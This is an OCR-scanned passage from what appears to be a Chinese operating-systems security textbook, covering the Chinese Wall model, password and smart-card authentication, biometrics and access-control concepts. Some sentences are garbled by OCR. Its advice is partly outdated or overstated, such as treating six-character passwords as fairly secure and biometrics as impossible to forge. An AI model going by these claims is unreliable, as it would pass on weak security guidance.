一 旦 主体 读 取 了 某 个 利益 冲突 类 中 的 一 个 客体 ， 那 么 该 主体 在 这 个 利益 冲突 类 中 所 
能 读 取 的 客体 必须 与 它 以 前 读 取 的 客体 属于 同一 个 企业 数据 集 ; 一 个 主体 在 每 个 利益 冲 
突 类 中 最 多 只 能 访问 一 个 企业 数据 集 ; 要 访问 一 个 利益 冲突 类 中 的 所 有 客体 ， 所 需要 的 
最 少 主体 个 数 应 该 与 利益 冲突 类 中 企业 数据 集 的 个 数 相 同 。 

中 国 墙 模型 的 *- 属 性 ， 主体 S 可 以 对 客体 O 进行 写 操作 ， 当 且 仅 当 以 下 两 个 条 件 同 
时 满足 : 

© 中 国 墙 简单 安全 条 件 允 许 S 读 取 O。 

@) S 不 能 读 取 属 于 不 同 数据 集 的 需要 保护 的 客体 。 

上 述 几 个 知名 的 安全 模型 的 表现 力 各 不 相同 。 有 的 比较 具体 ， 侧 重 于 解决 特定 的 安 
全 策略 ， 如 BLP 和 Biba 是 多 级 安全 模型 ， 用 安全 级 别 区 分 系统 中 对 象 ， 用 安全 级 别 间 
的 关系 来 控制 对 对 象 的 操作 ， 主 要 侧重 于 读 操 作 和 写 操作 等 有 限 的 几 个 操作 ; 有 的 比较 
通用 ， 不 和 特定 的 安全 需求 相关 ， 可 以 用 不 同 的 配置 满足 不 同 的 安全 需求 ， 如 RBAC 模 
型 可 以 用 不 同 的 配置 实现 自主 访问 控制 和 强制 访问 控制 ，DTE 模型 可 以 用 来 限定 特权 
操作 。 

安全 操作 系统 支持 哪些 安全 模型 是 由 安全 需求 决定 的 。 
4.2.4 操作 系统 的 安全 机 制 


操作 系统 的 安全 机 制 就 是 指 在 操作 系统 中 利用 某 种 技术 、 某 些 软件 来 实施 一 个 或 多 
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个 安全 服务 的 过 程 。 主 要 包括 : 标识 与 鉴别 机 制 ， 访 问 控制 机 制 ， 最 小 特权 管理 机 制 ， 
可 信 通 路 机 制 、 安 全 审计 机 制 ， 以 及 存储 保护 、 运 行 保护 和 IO 保护 机 制 。 
4.2.4.1 标识 与 鉴别 机 制 

身份 鉴别 是 计算 机 系统 正确 识别 用 户 个 人 身份 的 重要 途径 。 身 份 鉴别 是 安全 操作 系 
统 中 的 第 一 道 关 卡 ， 用 户 在 访问 安全 系统 之 前 ， 首 先 经 过 身份 鉴别 系统 识别 身份 ， 然 后 
访问 监控 器 根据 用 户 的 身份 和 授权 数据 库 决 定 用 户 是 否 能 够 访问 某 个 资源 。 

所 谓 标 识 就 是 用 户 要 向 系统 表明 自己 的 身份 。 标 识 应 当 具 有 唯一 性 ， 不 能 被 伪造 ， 
可 以 是 系统 为 用 户 分 配 唯一 的 用 户 名 、 登 录 ID、 身 份 证 号 或 智能 卡 等 。 

鉴别 就 是 对 用 户 所 声明 的 身份 标识 的 有 效 性 进行 校 验 和 测试 的 过 程 。 用 户 有 4 种 声 
明 自 己 身 份 的 方法 : 

(1) 证 实 自己 所 知道 的 ， 例 如 密码 、 身 份 证 号 码 、 最 喜欢 的 歌手 、 最 爱 的 人 的 名 字 
等 等 。 

(2) 出 示 自 己 所 拥有 的 ， 例 如 智能 卡 。 

(3) 证 明 自 己 是 谁 ， 例 如 指纹 、 语 音波 纹 、 视 网 膜 样 本 、 照 片 、 面 部 特征 扫描 等 等 。 

(4) 表现 自己 的 动作 ， 例 如 签名 、 键 入 密码 的 速度 与 力量 、 语 速 等 等 。 

授权 就 是 系统 向 用 户 赋予 的 对 目标 进行 操作 的 权利 和 特权 。 

鉴别 是 证 明 一 个 主体 的 身份 的 过 程 。 与 决定 把 什么 特权 附加 给 该 身份 的 授权 不 同 。 

身份 鉴别 要 识别 用 户 的 身份 ， 并 为 每 个 用 户 取 一 个 系统 可 以 识别 的 内 部 名 称 一 一 用 
户 标 识 符 。 用 户 标识 符 必须 是 唯一 的 且 不 能 被 伪造 ， 防 止 一 个 用 户 冒 充 另 一 个 用 户 。 将 
用 户 标识 符 与 用 户 联 系 的 过 程 称 为 鉴别 ， 鉴 别 过 程 主要 用 以 识别 用 户 的 真实 身份 ， 鉴 别 
操作 总 是 要 求 用 户 具 有 能 够 证 明 他 的 身份 的 特殊 信息 ， 并 且 这 个 信息 是 秘密 的 或 独 一 无 
二 的 ， 任 何其 他 用 户 都 不 能 拥有 它 。 

在 操作 系统 中 ， 身 份 鉴别 一 般 是 在 用 户 登录 时 发 生 的 。 口 令 机 制 是 简便 易 行 的 鉴别 
手段 ， 但 比较 脆弱 。 较 安全 的 口令 应 是 不 小 于 6 个 字符 并 同时 含有 数字 和 字母 的 口令 
并 且 限 定 一 个 口令 的 生存 周期 。 另 外 智能 卡 、 生 物 技术 也 是 目前 比较 常用 的 鉴别 用 户 身 
份 的 方法 。 

用 户 名 /口令 鉴别 技术 是 最 简单 、 最 普遍 的 身份 识别 技术 ， 如 : 各 类 系统 的 登录 等 。 
口令 具有 共享 秘密 的 属性 ， 是 相互 约定 的 代码 ， 只 有 用 户 和 系统 知道 。 例 如 ， 用 户 把 他 
的 用 户 名 和 口令 送 服务 器 ， 服 务 器 操作 系统 鉴别 该 用 户 。 

口令 有 时 由 用 户 选择 ， 有 时 由 系统 分 配 。 系 统 为 每 一 个 合法 用 户 建立 一 个 用 户 名 / 
口令 对 ， 当 用 户 登 录 系 统 或 使 用 某 项 功能 时 ， 提 示 用 户 输入 自己 的 用 户 名 和 口令 ， 系 统 
通过 核对 用 户 输入 的 用 户 名 、 口令 与 系统 内 已 有 的 合法 用 户 的 用 户 名 /口令 对 (这 些 用 户 
名 /口令 对 在 系统 内 是 加 密 存 储 的 ) 是 否 匹 配 ， 如 与 某 一 项 用 户 名 /口令 对 匹配 ， 则 该 用 
户 的 身份 得 到 了 鉴别 。 口 令 有 多 种 ， 如 一 次 性 口令 ; 基于 时 间 的 口令 等 。 

利用 口令 进行 身份 鉴别 的 过 程 如 下 : 用 户 将 口令 传送 给 计算 机 ; 计算 机 完成 口令 单 
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向 函数 值 的 计算 ， 计 算 机 把 单 向 函数 值 和 机 器 存储 的 值 比较 。 

一 旦 利用 口令 进行 身份 鉴别 ， 至 少 应 该 满足 ， 当 用 户 选 择 了 一 个 其 他 用 户 已 使 用 的 
口令 时 ，TCB 应 保持 沉默 ;，TCB 应 以 单 向 加 密 方式 存储 口令 , 访问 加 密 口 令 必须 具有 特 
权 ; 在 口令 输入 或 显示 设备 上 ，TCB 应 自动 隐藏 口令 明文 ; 在 普通 操作 过 程 中 ，TCB 在 
默认 情况 下 应 禁止 使 用 空 口令 ; TCB 应 提供 一 种 保护 机 制 允 许 用 户 更 换 自己 的 口令 , 这 
种 机 制 要 求 重新 鉴别 用 户 身 份 ， 对 每 一 个 用 户 或 每 一 组 用 户 ，TCB 必须 加 强 口令 失效 管 
理 ; 在 要 求 用 户 更 改口 令 时 ，TCB 应 事先 通知 用 户 ; 要 求 在 系统 指定 的 时 间 段 内 ， 同 一 
用 户 的 口令 不 可 重用 ; TCB 应 提供 一 种 算法 确保 用 户 输入 口令 的 复杂 性 ; 如 果 有 口令 生 
成 算法 ， 它 必须 满足 : 产生 的 口令 容易 记忆 ， 比 如 说 具有 可 读 性 ， 用 户 可 自行 选择 可 选 
口令 ， 口 令 应 在 一 定 程度 上 能 抵御 字典 攻击 ， 如 果 口 令 生 成 算法 可 使 用 非 字母 符号 ， 
令 的 安全 不 能 依赖 于 将 这 些 非 字母 符号 保密 ， 生 成 口令 的 顺序 应 具有 随机 性 ， 连 续 生 成 
的 口令 应 毫 不 相关 ， 口令 的 生成 不 具有 周期 性 。 

口令 系统 提供 的 安全 性 依赖 于 口令 的 保密 性 ， 这 就 要 求 : 当 用 户 在 系统 注册 时 ， 必 
须 赋予 用 户口 令 ， 用 户口 令 必 须 定期 更 改 ， 系统 必须 维护 一 个 口令 数据 库 ， 用 户 必 须 记 
忆 自 身 的 口令 ; 在 系统 鉴别 用 户 时 ， 用 户 必须 输入 口令 。 

由 上 可 以 看 出 ,口令 质量 是 一 个 非常 关键 的 因素 ， 它 涉及 口令 空间 的 大 小 ,口令 加 
密 算法 以 及 口令 长 度 。 

口令 的 安全 性 由 口令 有 效 期 内 被 猜 出 的 可 能 性 决定 。 可 能 性 越 小 ， 口 令 越 安全 。 在 
其 他 条 件 相同 的 情况 下 ， 口 令 越 长 ， 安 全 性 越 高 。 口 令 有 效 期 越 短 ， 口 令 被 猜 出 的 可 能 
性 越 小 。 

另外 系统 管理 员 和 用 户 也 应 加 强 安全 意识 , 保护 口令 的 安全 。 例如 , 使 用 用 户 名 (上 账 
号 ) 作为 口令 ; 使 用 用 户 名 账号) 的 变换 形式 作为 口令 ; 使 用 自己 或 者 亲友 的 生日 作 
为 口令 ; 使 用 常用 的 英文 单词 作为 口令 ;使 用 5 位 或 5 位 以 下 的 字符 作为 口令 等 ， 都 是 
不 安全 的 口令 。 

信息 系统 依靠 口令 来 进行 保护 是 十 分 脆弱 的 。 口 令 往往 会 遭 到 攻击 。 常 见 的 攻击 手 
段 有 : 网 络 数据 流 窃听 ; 鉴别 信息 的 截取 / 重 放 〈Record/Replay); 字典 攻击 ; 穷 举 尝试 
(Brute Force); 宕 探 , 社交 工程 ， 垃 圾 搜索 等 。 

为 了 增强 口令 的 安全 性 ， 需 选择 很 难 破译 的 加 密 算法 ， 让 硬件 解密 商品 不 能 发 挥 作 
FAs 控制 用 户口 令 的 强度 长度、 混合 、 大 小 写 ); BAO, HHA, Make 
序 取 一 个 12 位 的 随机 数 ( 通 过 读 取 实 时 时 钟 ) 并 把 它 拼 到 用 户 输入 的 口令 后 面 , 然后 加 
密 这 个 复合 串 ， 最 后 把 64 位 的 加 密 结 果 连 同 12 位 的 随机 数 一 起 存 入 口令 文件 ， 不 要 暴 
露 账户 是 否 存在 的 信息 ; 限制 口令 尝试 次 数 ， 系 统 中 只 保存 口令 的 加 密 形式 ， 一 次 性 
令 (OTP: One Time Password) 在 登录 过 程 中 加 入 不 确定 因素 ， 使 每 次 登录 过 程 中 传送 
的 信息 都 不 相同 ， 以 对 付 重 放 攻击 ， 一 次 性 口令 也 称 为 动态 口令 。 

系统 应 对 口令 的 使 用 和 更 改进 行 审计 。 审 计 事 件 包括 成 功 登 录 、 失 败 尝试 、 口 令 更 
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改 程序 的 使 用 、 口 令 过 期 后 上 锁 的 用 户 账号 等 。 同 一 访问 端口 或 使 用 同一 用 户 账号 连续 
5 次 (或 其 他 阔 值 )》 以 上 的 登录 失败 应 立即 通知 系统 管理 员 。 在 成 功 登录 时 ， 系 统 应 通 
知 用 户 以 下 信息 : 用 户 上 一 次 成 功 登 录 的 日 期 和 时 间 、 用 户 登 录 地 点 、 从 上 一 次 成 功 登 
录 以 后 的 所 有 失败 登录 。 

考虑 到 口令 的 脆弱 性 ， 智 能 卡 技术 将 成 为 用 户 接 入 和 用 户 身份 鉴别 等 安全 要 求 的 首 
选 技术 。 基 于 USB-Key 的 身份 鉴别 方式 是 近 几 年 发 展 起 来 的 一 种 方便 、 安 全 的 身份 鉴别 
技术 。 它 采用 软 硬 件 相 结合 、 一 次 一 密 的 强 双 因子 鉴别 模式 ， 很 好 地 解决 了 安全 性 与 易 
用 性 之 间 的 矛盾 。USB-Key 是 一 种 USB 接口 的 硬件 设备 ， 它 内 置 单片机 或 智能 卡 芯片 ， 
可 以 存储 用 户 的 密 钥 、 数 字 证 书 或 其 他 身份 信息 , 利用 USB-Key 内 置 的 密码 算法 实现 对 
用 户 身份 的 鉴别 。 

用 户 将 从 持 有 鉴别 执照 的 可 信 发 行者 手 里 取得 智能 卡 安全 设备 ， 也 可 从 其 他 公共 密 
钥 密 码 安全 方案 发 行者 那里 获得 。 这 样 智能 卡 的 读 取 器 必 将 成 为 用 户 接 入 和 鉴别 安全 解 
决 方案 的 一 个 关键 部 分 。 

智能 卡 的 优点 是 存储 容量 大 、 体 积 小 而 轻 、 保密 性 强 、 网 络 要 求 低 ; 数据 可 靠 性 高 ， 
防磁 、 防 静电 、 防 潮 、 耐 温 、 抗 干扰 能 力 强 ， 一 张 智 能 卡片 可 重复 读 写 十 万 次 ， 卡 中 数 
据 可 保存 几 十 年 ; 智能卡 读 写 操作 通过 电信 和 号 传输 来 完成 ， 因 而 对 计算 机 的 实时 性 、 敏 
感性 要 求 降低 ， 内 部 数据 保密 性 、 可 靠 性 好 ， 读 写 稳定 可 脱 机 工作 ， 易 于 安装 维护 。 

在 用 户 进行 电子 商务 交易 前 ， 服 务 器 首先 使 用 智能 卡 完成 用 户 身份 的 鉴别 。 

身份 鉴别 过 程 中 为 了 产生 变动 的 口令 ， 一 般 采 用 双 运 算 因 子 的 计算 方式 ， 也 就 是 加 
密 算法 的 输入 值 有 两 个 数值 ， 其 一 为 用 户 密 钥 、 另 一 为 变动 因子 。 由 于 用 户 密 钥 为 固定 
数值 ， 因 此 变动 因子 必须 不 断 变动 才 可 以 算出 不 断 变动 的 动态 密码 。 服 务 器 及 智能 卡 必 
须 随时 保持 相同 的 变动 因子 ， 才 能 算出 相同 的 动态 口令 。 基 于 智能 卡 的 鉴别 方式 主要 有 
三 种 : 

第 一 种 是 询问 /应 答 鉴 别 。 变动 因子 是 由 服务 器 产生 的 随机 数字 。 鉴 别 过 程 如 下 : 登 
录 请 求 , 客户 机 首先 向 服务 器 发 出 登录 请 求 , 服务 器 提示 用 户 输入 用 户 ID 和 PIN. 询问 
用 户 提 供 ID 给 服务 器 ， 然 后 服务 器 提供 一 个 随机 串 X (Challenge) 给 插 在 客户 端的 智 
能 卡 作 为 验证 算法 的 输入 ， 服 务 器 则 根据 用 户 ID 取出 对 应 的 密 钥 K 后 ， 利 用 发 送 给 客 
户 机 的 随机 串 ,在 服务 器 上 用 加 密 引 擎 进行 运算 ， 得 到 运算 结果 RS。 应 答 ， 智 能 卡 根 
据 X 与 内 在 密 钥 使 用 硬件 加 密 引 擎 运算 , 也 得 到 一 个 运算 结果 RC, 并 发 送 给 服务 器 。 
验证 ， 比 较 RS 和 RC 便 可 确定 用 户 的 合法 性 。 

由 于 密 钥 存 在 于 智能 卡 中 ， 运 算 过 程 也 是 在 智能 卡 中 完成 ， 密 钥 鉴 别 是 通过 加 密 算 
法 来 实现 的 ， 因 而 极 大 地 提高 了 安全 性 。 并 且 每 当 客户 端 有 一 次 服务 申请 时 ， 服 务 器 便 
产生 一 个 随机 串 给 客户 , 即使 在 网 上 传输 的 鉴别 数据 被 截获 , 也 不 能 带 来 安全 上 的 问题 。 

询问 /应 答 身份 鉴别 的 优点 : 没有 同步 的 问题 ; 一 片 鉴别 卡 可 以 用 来 存 取 被 不 同 鉴别 
服务 器 所 保护 的 系统 ， 最 安全 的 鉴别 方式 。 缺 点 : 使 用 者 必须 按 较 多 的 按钮 ， 操 作 较 繁 
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Ks 比较 多 输入 的 失误 。 

第 二 种 是 时 间 同 步 鉴 别 。 变 动因 子 使 用 服务 器 端 与 客户 端的 同步 时 间 值 。 鉴 别 过 程 
如 下 : 用 户 向 服务 器 发 出 登录 请 求 ， 服 务 器 提示 用 户 输入 用 户 ID 和 用 户 PIN。 服 务 器 根 
据 用 户 ID 取出 对 应 的 密 钥 K, EH K 与 服务 器 时 间 计算 动态 口令 RS。 智能卡 根据 内 
在 的 密 钥 K 与 客户 机 时 间 T 使 用 相同 的 专用 算法 计算 动态 口令 RC， 并 发 送 给 服务 器 。 
服务 器 比较 RS 与 RC， 如 果 相 同 则 用 户 合法 。 

时 间 同 步 鉴别 卡 在 一 个 固定 期 间 中 〈 通 常 是 一 分 钟 ) 产生 同一 个 动态 口令 ， 依 据 时 
间 的 流逝 产生 不 同 的 口令 。 

时 间 同 步 鉴 别 的 优点 : 易于 使 用 。 缺 点 : 时 间 同 步 困 难 ， 可 能 造成 必须 重新 输入 新 
口令 ， 时 间 同 步 鉴 别 卡 采用 PC 的 时 刻 ， 很 可 能 随时 被 修改 ， 常 常 需要 与 服务 器 重新 对 
时 ; 不 如 询问 /应 答 鉴别 安全 。 

第 三 种 是 事件 同步 。 事 件 同步 鉴别 卡 依据 鉴别 卡 上 的 私有 密 钥 产生 一 序列 的 动态 口 
令 ， 如 果 使 用 者 意外 多 产生 了 几 组 口令 造成 不 同步 的 状态 ， 服 务 器 会 自动 重新 同步 到 目 
前 使 用 的 口令 ， 一 旦 一 个 口令 被 使 用 过 后 ， 在 口令 序列 中 所 有 这 个 口令 之 前 的 口令 都 会 
失效 。 

事件 同步 的 身份 鉴别 优点 : 容易 使 用 ， 由 于 使 用 者 无 法 知道 序列 数字 ， 所 以 安全 性 
高 ， 序 列 号 码 绝 不 会 显示 出 来 。 缺 点 : 如果 没 有 PIN 号 码 的 保护 及 鉴别 卡 借 给 别人 使 用 
时 ， 会 有 安全 问题 。 

生物 识别 技术 主要 是 指 通过 可 测量 的 身体 或 行为 等 生物 特征 进行 身份 鉴别 的 一 种 
技术 。 生 物 特 征 是 指 唯一 地 可 以 测量 或 可 自动 识别 和 验证 的 生理 特征 或 行为 方式 。 生 物 
特征 分 为 身体 特征 和 行为 特征 两 类 。 身 体 特 征 包 括 : 指纹 、 掌 型 、 视 网 膜 、 虹 膜 、 人 体 
气味 、 脸 型 、 手 的 血管 和 DNA 等 ; 行为 特征 包括 : 签名 、 语 音 、 行 走 步 态 等 。 目 前 章 
分 学 者 将 视网膜 识别 、 虹 膜 识 别 和 指纹 识别 等 归 为 高 级 生物 识别 技术 ;将 掌 型 识别 、 脸 
型 识别 、 语 音 识 别 和 签名 识别 等 归 为 次 级 生物 识别 技术 ;将 血管 纹理 识别 、 人 体 气味 识 
别 、DNA 识别 等 归 为 “深奥 的 ”生物 识别 技术 。 与 传统 身份 鉴别 技术 相 比 ， 生 物 识 别 技 
术 具 有 以 下 特点 。 

随身 性 : 生物 特征 是 人 体 固有 的 特征 ， 与 人 体 是 唯一 绑 定 的 ， 具 有 随身 性 。 

安全 性 : 人 体 特征 本 身 就 是 个 人 身份 的 最 好 证 明 ， 满 足 更 高 的 安全 需求 。 

唯一 性 : 每 个 人 拥有 的 生物 特征 各 不 相同 。 

稳定 性 : 生物 特征 如 指纹 、 虹 膜 等 人 体 特征 不 会 随时 间 等 条 件 的 变化 而 变化 。 

广泛 性 : 每 个 人 都 具有 这 种 特征 。 

方便 性 : 生物 识别 技术 不 需 记 忆 密码 与 携带 使 用 特殊 工具 〈 如 钥匙 ) ， 不 会 遗失 。 
可 采集 性 : 选择 的 生物 特征 易于 测量 。 

可 接受 性 : 使 用 者 对 所 选择 的 个 人 生物 特征 及 其 应 用 愿意 接受 。 
基于 以 上 特点 ， 生 物 识别 技术 具有 传统 的 身份 鉴别 手段 无 法 比拟 的 优点 。 采 用 生物 
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识别 技术 ， 可 不 必 再 记忆 和 设置 密码 ， 使 用 更 加 方便 。 

基于 生物 特征 的 身份 鉴别 ， 也 称 为 主体 特征 鉴别 。 目 前 已 有 的 设备 包括 : 指纹 分 析 
机 、 视 网 膜 扫描 仪 、 声 音 验证 设备 、 手 型 识别 器 等 。 在 基于 生物 技术 的 身份 鉴别 技术 中 
指纹 识别 为 最 可 靠 的 鉴别 技术 之 一 。 与 其 他 生物 特征 相 比 ， 指 纹 特征 更 容易 提取 ， 外 形 
尺寸 较 小 ， 而 且 识别 精度 高 ， 这 使 得 指纹 识别 技术 得 到 迅速 发 展 并 且 被 广泛 应 用 于 身份 
鉴别 的 各 个 领域 。 例 如 : 系统 中 存储 了 某 人 的 指纹 ， 当 他 接 入 网 络 时 ， 就 必须 在 连接 到 
网 络 的 电子 指纹 机 上 提供 他 的 指纹 (这 就 防止 他 以 假 的 指纹 或 其 他 电子 信息 欺骗 系统 ) ， 
只 有 指纹 相符 才 允 许 他 访问 系统 。 更 普通 的 是 通过 视网膜 膜 血管 分 布 图 来 识别 ， 原 理 与 
指纹 识别 相同 ， 声 波纹 识别 也 是 商业 系统 采用 的 一 种 识别 方式 。 

简单 和 安全 是 互相 矛盾 的 两 个 因素 。 用 户 名 /口令 具有 实现 简单 的 优点 , 但 缺点 是 
令 容 易 被 截获 ， 维 护 的 成 本 较 高 ， 容 易 在 输入 的 时 候 被 攻击 者 偷 宕 ， 而 且 用 户 无 法 及 时 
发 现 。 

对 用 户 进行 基于 生物 特征 的 身份 鉴别 时 ， 如 指纹 、 声 音 或 签字 ， 需 要 特殊 硬件 ， 这 
就 限制 了 生物 技术 只 能 用 在 比较 少 的 环境 中 。 其 吸引 人 的 地 方 是 生物 识别 绝 不 可 能 丢失 
和 被 偷窃 。 实 际 上 ， 基 于 生物 特征 的 身份 鉴别 也 存在 着 某 些 局 限 性 。 传 统 的 安全 常识 认 
为 鉴别 数据 应 有 规则 地 进行 变化 ， 而 使 用 指纹 阅读 器 难于 做 到 这 一 点 ; 另外 利用 生物 特 
征 不 能 给 出 准确 的 答案 ， 如 即使 来 自 一 个 人 ， 也 没有 两 个 签字 是 绝对 相同 的 ， 还 有 一 些 
其 他 因素 的 影响 ， 例 如 疲劳 程度 、 心 境 状况 和 健康 状况 等 ， 所 以 在 匹配 算法 中 必须 建立 
某 些 公差 。 

基于 生物 特征 的 身份 鉴别 优点 : 绝对 无 法 仿冒 的 使 用 者 鉴别 技术 。 缺 点 ， 较 昂贵 ; 
不 够 稳定 辨识 失败 率 高 》。 

单独 用 一 种 方法 进行 鉴别 并 不 充分 ， 可 将 儿 种 鉴别 方法 结合 起 来 进行 鉴别 。 如 某 些 
系统 使 用 智能 卡 存储 每 个 用 户 的 生物 特征 数据 ， 这 避免 了 需要 主机 数据 库 ， 而 是 依赖 于 
卡 的 安全 性 来 防止 算 改 。 在 用 户 和 智能 卡 之 间 的 协议 中 ， 结 合 了 来 自主 机 的 随机 质询 ， 
因而 避免 了 重播 攻击 。 

在 安全 操作 系统 中 ， 可 信 计 算 基 〈TCB) 要 求 先进 行 用 户 鉴别 ， 之 后 才 开始 执行 要 
TCB 调节 的 任何 其 他 活动 。 此 外 TCB 要 维持 鉴别 数据 ， 不 仅 包括 确定 各 个 用 户 的 许可 
证 和 授权 的 信息 ， 而 且 包 括 为 验证 各 个 用 户 标 识 所 需 的 信息 〈 如 口令 等 ) 。 这 些 数据 将 
由 TCB 使 用 ， 对 用 户 标 识 进行 认证 ， 并 确保 由 代表 用 户 的 活动 所 创建 的 TCB 之 外 的 主 
体 的 安全 级 和 授权 是 受 那个 用 户 的 许可 证 和 授权 支配 的 。TCB 还 必须 保护 鉴别 数据 ， 保 
证 它 不 被 任何 非 授权 用 户 存 取 。 

所 有 用 户 都 必须 进行 身份 鉴别 。 所 以 需要 建立 一 个 登录 进程 与 用 户 交 互 以 得 到 用 于 
身份 鉴别 的 必要 信息 。 首 先 用 户 提供 一 个 唯一 的 用 户 标识 符 给 TCB; 接着 TCB 对 用 户 
进行 鉴别 。TCB 必须 能 证 实 该 用 户 的 确 对 应 于 所 提供 的 标识 符 。 这 就 要 求 鉴别 机 制 做 到 
以 下 儿 点 : 
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@ 在 进行 任何 需要 TCB 仲裁 的 操作 之 前 ，TCB 都 应 该 要 求 用 户 标识 他 们 自己 。 

@ TCB 必须 维护 鉴别 数据 ， 包 括 证 实用 户 身份 的 信息 以 及 决定 用 户 策略 属性 的 
信息 。 

@ TCB 保护 鉴别 数据 ， 防 止 被 非法 用 户 使 用 。 

@ TCB 应 能 维护 、 保 护 、 显 示 所 有 活动 用 户 和 所 有 用 户 账户 的 状态 信息 。 

另外 数字 证 书 是 一 种 检验 用 户 身份 的 电子 文件 ， 也 是 企业 现在 可 以 使 用 的 一 种 工 
具 。 这 种 证 书 可 以 授权 购买 ， 提 供 更 强 的 访问 控制 ， 并 具有 很 高 的 安全 性 和 可 靠 性 。 

非 对称 体 制 身份 鉴别 的 关键 是 将 用 户 身份 与 密 钥 绑 定 。CA (Certificate Authority) 
通过 为 用 户 发 放 数 字 证 书 〈Certificate) 来 证 明 用 户 公 钥 与 用 户 身 份 的 对 应 关系 。 验 证 者 
向 用 户 提供 一 随机 数 ， 用 户 以 其 私 钥 KS 对 随机 数 进行 签名 ， 将 签名 和 自己 的 证 书 提交 
给 验证 方 ; 验证 者 验证 证 书 的 有 效 性 ， 从 证 书 中 获得 用 户 公 钥 KP, A KP 验证 用 户 签名 
的 随机 数 。 

身份 鉴别 系统 架构 包含 三 项 主要 组 成 元 件 : 

© 鉴别 服务 器 (Authentication Server)， 人 负责 进行 使 用 者 身份 鉴别 的 工作 ， 服 务 器 
上 存放 使 用 者 的 私有 密 钥 、 鉴 别 方式 及 其 他 使 用 者 鉴别 的 信息 。 

© 鉴别 系统 用 户 端 软 件 (Authentication Client Software)， 鉴 别 系统 用 户 端 通常 都 
是 需要 进行 登录 (login) 的 设备 或 系统 ， 在 这 些 设备 及 系统 中 必须 具备 可 以 与 鉴别 服务 
器 协同 运作 的 鉴别 协定 。 

© 鉴别 设备 (Authenticator)， 鉴 别 设备 是 使 用 者 用 来 产生 或 计算 密码 的 软 人 硬件 
设备 。 

从 实用 角度 而 言 ， 一 个 安全 的 身份 鉴别 协议 至 少 应 满足 以 下 现 两 个 条 件 ， 鉴别 者 A 
能 向 验证 者 B 证 明 他 的 确 是 A; 在 鉴别 者 A 向 验证 者 提供 了 证 明 他 的 身份 的 信息 后 ， 验 
证 者 B 不 能 取得 A 的 任何 有 用 的 信息 ， 即 B 不 能 模仿 A 向 第 三 方 证 明 他 是 A。 

目前 已 设计 出 了 许多 满足 上 述 条 件 的 鉴别 协议 ， 主 要 有 以 下 几 类 : 一 次 一 密 机 制 ; 
X.509 鉴别 协议 ，Kerberos 鉴别 协议 ， 零 知识 身份 鉴别 等 。 
4.2.4.2 ”访问 控制 机 制 

访问 是 使 信息 在 主体 和 对 象 间 流 动 的 一 种 交互 方式 。 访 问 控制 是 对 信息 系统 资源 进 
行 保护 的 重要 措施 ， 适 当 的 访问 控制 能 够 阻止 未 经 允许 的 用 户 有 意 或 无 意 地 获取 数据 。 

访问 控制 的 手段 包括 用 户 识别 代码 、 口 令 、 登 录 控制 、 资 源 授 权 〔 例 如 用 户 配置 文 
件 、 资 源 配置 文件 和 控制 列表 )、 授 权 核查 、 日 志和 审计 。 

访问 控制 的 类 型 包括 6 种 : 防御 型 、 探 测 型 、 矫 正 型 、 管 理 型 、 技 术 型 和 操作 型 控 
制 。 防 御 型 控制 用 于 阻止 不 良 事件 的 发 生 ;， 侦 测 型 控制 用 于 探测 已 经 发 生 的 不 良 事件 ; 
矫正 型 控制 用 于 矫正 已 经 发 生 的 不 良 事件 ;管理 型 控制 用 于 管理 系统 的 开发 、 维 护 和 使 
用 ， 包 括 针 对 系统 的 策略 、 规 程 、 行 为 规范 、 个 人 的 角色 和 义务 、 个 人 职能 和 人 事 安 全 
决策 ; 技术 型 控制 是 用 于 为 信息 技术 系统 和 应 用 提供 自动 保护 的 硬件 和 软件 控制 手段 ， 
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技术 型 控制 应 用 于 技术 系统 和 应 用 中 ; 操作 型 控制 是 用 于 保护 操作 系统 和 应 用 的 日 常规 
程 和 机 制 。 它 们 主要 涉及 在 人 们 (相对 于 系统 ) 使 用 和 操作 中 使 用 的 安全 方法 ， 影 响 到 
系统 和 应 用 的 环境 。 

1. 访问 控制 策略 和 机 制 

访问 控制 涉及 到 三 个 基本 概念 ， 即 主体 、 客 体 和 授权 访问 。 

主体 : 一 个 主动 的 实体 , 该 实体 造成 了 信息 的 流动 和 系统 状态 的 改变 , 它 包 括 用 户 、 
用 户 组 、 终 端 、 主 机 或 一 个 应 用 ， 主 体 可 以 访问 客体 。 

客体 : 指 一 个 包含 或 接受 信息 的 被 动 实体 ， 对 客体 的 访问 要 受 控 。 它 可 以 是 一 个 字 
节 、 人 字段、 记录、 程序、 文件 ， 或 者 是 一 个 处 理 器 、 存 储 器 、 网 络 节点 等 。 

授权 访问 : 指 主体 访问 客体 的 允许 ， 授 权 访问 对 每 一 对 主体 和 客体 来 说 是 给 定 的 ， 
决定 了 谁 能 够 访问 系统 ， 能 访问 系统 的 何 种 资源 以 及 如 何 使 用 这 些 资源 。 例 如 ， 授 权 访 
问 有 读 写 、 执 行 ， 读 写 客体 是 直接 进行 的 ， 而 执行 是 搜索 文件 、 执 行文 件 。 对 用 户 的 授 
权 访 问 是 由 系统 的 安全 策略 决定 的 。 

在 计算 机 系统 中 ， 访 问 控制 包括 以 下 三 个 任务 : 授权 ， 即 确定 可 给 予 哪些 主体 存 取 
客体 的 权力 ;确定 存 取 权限 ( 读 、 写 、 执 行 、 删 除 、 追 加 等 存 取 方 式 的 组 合 ); 实施 存 
取 权 限 。 

在 一 个 访问 控制 系统 中 , 区 别 主体 与 客体 很 重要 。 首先 由 主体 发 起 访问 客体 的 操作 ， 
该 操作 根据 系统 的 授权 或 被 允许 或 被 拒绝 。 另 外 ， 主 体 与 客体 的 关系 是 相对 的 ， 当 一 个 
主体 受到 另 一 主体 的 访问 ， 成 为 访问 目标 时 ， 该 主体 便 成 为 了 客体 。 

访问 控制 的 目的 是 为 了 限制 访问 主体 对 访问 客体 的 访问 权限 ， 从 而 使 计算 机 系统 在 
合法 范围 内 使 用 ， 它 决定 用 户 能 做 什么 ， 也 决定 代表 一 定 用 户 身份 的 进程 能 做 什么 。 

访问 控制 策略 是 用 于 规定 如 何 做 出 访问 决定 的 策略 。 传 统 的 访问 控制 策略 包括 一 组 
由 操作 规则 定义 的 基本 操作 状态 。 典 型 的 状态 包含 一 组 主体 (S) 、 一 组 对 象 (0) 、 一 
组 访问 权 (AI[S，O]) ， 包 括 读 、 写 、 执 行 和 拥有 。 

访问 控制 策略 涵盖 对 象 、 主 体 和 操作 ， 通 过 对 访问 者 的 控制 达到 保护 重要 资源 的 目 
的 。 对 和 象 包括 终端 、 文 本 和 文件 ， 系 统 用 户 和 程序 被 定义 为 主体 。 操 作 是 主体 和 客体 的 
